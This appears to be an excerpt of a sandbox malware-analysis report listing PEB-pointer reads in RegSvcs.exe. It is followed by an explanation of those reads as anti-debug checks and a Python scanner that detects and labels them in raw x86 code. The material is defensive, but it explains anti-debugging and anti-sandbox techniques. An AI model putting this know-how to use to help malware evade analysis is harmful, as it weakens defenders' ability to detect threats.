Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF9100 mov eax, dword ptr fs:[00000030h]1_2_00EF9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF9100 mov eax, dword ptr fs:[00000030h]1_2_00EF9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF9100 mov eax, dword ptr fs:[00000030h]1_2_00EF9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F22AE4 mov eax, dword ptr fs:[00000030h]1_2_00F22AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F22ACB mov eax, dword ptr fs:[00000030h]1_2_00F22ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F0AAB0 mov eax, dword ptr fs:[00000030h]1_2_00F0AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F0AAB0 mov eax, dword ptr fs:[00000030h]1_2_00F0AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2FAB0 mov eax, dword ptr fs:[00000030h]1_2_00F2FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF52A5 mov eax, dword ptr fs:[00000030h]1_2_00EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF52A5 mov eax, dword ptr fs:[00000030h]1_2_00EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EF52A5 mov eax, dword ptr fs:[00000030h]1_2_00EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
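Every entry above is the same primitive: on 32-bit Windows, fs:[0x30] is the TEB field that holds the pointer to the Process Environment Block, so `mov eax, dword ptr fs:[00000030h]` is the first step of almost every inline anti-debug or anti-sandbox check (PEB.BeingDebugged at +0x02, PEB.NtGlobalFlag at +0x68) and of manual import resolution via PEB.Ldr at +0x0C. The sandbox signature fires on the read itself, not on which field is consumed afterwards. The scanner below, added here as an example and not part of the Joe Sandbox report or its tooling, finds the standard IA-32 encodings of that read in a raw code blob and, where the next instruction is a recognisable PEB field access, labels what the read is for. The byte sample and the base address `0x00F20000` used in the usage note are constructed for illustration and are not taken from the analysed RegSvcs.exe image.

```python
"""Locate reads of the PEB pointer (fs:[0x30]) in raw 32-bit x86 code.

Added example; not code from the Joe Sandbox report. The encodings are the
standard IA-32 ones; SAMPLE is a constructed byte string, not sample data
from the analysed binary.
"""
import re
from typing import Dict, List, Tuple

# disp32 operand of the read: TEB.ProcessEnvironmentBlock lives at fs:[0x30].
PEB_DISP = b"\x30\x00\x00\x00"

# 64 = FS segment-override prefix.
# A1 disp32      : mov eax, moffs32 (the short form assemblers emit for eax)
# 8B /r disp32   : mov r32, r/m32 with ModRM mod=00, rm=101 (absolute disp32);
#                  ModRM 0x05=eax 0x0D=ecx 0x15=edx 0x1D=ebx 0x35=esi 0x3D=edi
_PEB_READ_PATTERNS: List[Tuple[bytes, str]] = [
    (b"\x64\xA1" + PEB_DISP, "eax"),
    (b"\x64\x8B\x05" + PEB_DISP, "eax"),
    (b"\x64\x8B\x0D" + PEB_DISP, "ecx"),
    (b"\x64\x8B\x15" + PEB_DISP, "edx"),
    (b"\x64\x8B\x1D" + PEB_DISP, "ebx"),
    (b"\x64\x8B\x35" + PEB_DISP, "esi"),
    (b"\x64\x8B\x3D" + PEB_DISP, "edi"),
]

# Instructions that commonly follow `mov eax, fs:[30h]` and reveal the intent.
_EAX_FOLLOW_UPS: Dict[bytes, str] = {
    b"\x0F\xB6\x40\x02": "PEB.BeingDebugged",   # movzx eax, byte ptr [eax+2]
    b"\x8B\x40\x68": "PEB.NtGlobalFlag",        # mov eax, dword ptr [eax+68h]
    b"\x8B\x40\x0C": "PEB.Ldr",                 # mov eax, dword ptr [eax+0Ch]
}

UNCLASSIFIED = "PEB read (follow-up not recognised)"


def find_peb_reads(blob: bytes, base: int = 0) -> List[Tuple[int, str, int]]:
    """Return (address, destination register, instruction length) for every
    fs:[0x30] read in `blob`, sorted by address. `base` is added to offsets so
    the output lines up with a disassembler's virtual addresses."""
    hits: List[Tuple[int, str, int]] = []
    for pattern, reg in _PEB_READ_PATTERNS:
        for m in re.finditer(re.escape(pattern), blob):
            hits.append((base + m.start(), reg, len(pattern)))
    hits.sort()
    return hits


def classify_peb_reads(blob: bytes, base: int = 0) -> List[Tuple[int, str, str]]:
    """Pair each PEB read with a purpose label derived from the instruction
    that immediately follows it (only attempted for the eax form, since the
    follow-up patterns dereference eax)."""
    results: List[Tuple[int, str, str]] = []
    for va, reg, length in find_peb_reads(blob, base):
        next_off = va - base + length
        purpose = UNCLASSIFIED
        if reg == "eax":
            for pattern, field in _EAX_FOLLOW_UPS.items():
                if blob.startswith(pattern, next_off):
                    purpose = field
                    break
        results.append((va, f"mov {reg}, dword ptr fs:[00000030h]", purpose))
    return results


def format_like_report(blob: bytes, base: int = 0, module: str = "sample.exe") -> List[str]:
    """Render hits in the same shape as the sandbox's 'Code function' lines."""
    return [
        f"Source: {module} | Code function: {va:08X} {mnemonic} ; {purpose}"
        for va, mnemonic, purpose in classify_peb_reads(blob, base)
    ]


# Constructed sample: a BeingDebugged check, an Ldr walk via ecx, and an
# NtGlobalFlag check, with a prologue and ret as filler.
SAMPLE = (
    b"\x55\x8B\xEC"                     # push ebp; mov ebp, esp
    b"\x64\xA1\x30\x00\x00\x00"         # mov eax, fs:[30h]            (offset 3)
    b"\x0F\xB6\x40\x02"                 # movzx eax, byte ptr [eax+2]  BeingDebugged
    b"\x85\xC0"                         # test eax, eax
    b"\x64\x8B\x0D\x30\x00\x00\x00"     # mov ecx, fs:[30h]            (offset 15)
    b"\x8B\x41\x0C"                     # mov eax, [ecx+0Ch]
    b"\x64\xA1\x30\x00\x00\x00"         # mov eax, fs:[30h]            (offset 25)
    b"\x8B\x40\x68"                     # mov eax, [eax+68h]           NtGlobalFlag
    b"\xC3"                             # ret
)

if __name__ == "__main__":
    # Hypothetical base address, chosen only to resemble the report's addresses.
    for line in format_like_report(SAMPLE, base=0x00F20000, module="RegSvcs.exe"):
        print(line)
```

Two caveats when using this against a real image: a byte scan over a whole section will also match inside data or in the middle of an unrelated instruction, whereas the report's per-function counts come from a disassembler that only considers reachable code; and 64-bit code reaches the PEB through gs:[0x60], which these patterns do not cover. A read whose follow-up is not one of the three listed here is still a PEB access, it just needs a human look at the next few instructions to decide whether it is anti-analysis or ordinary module lookup.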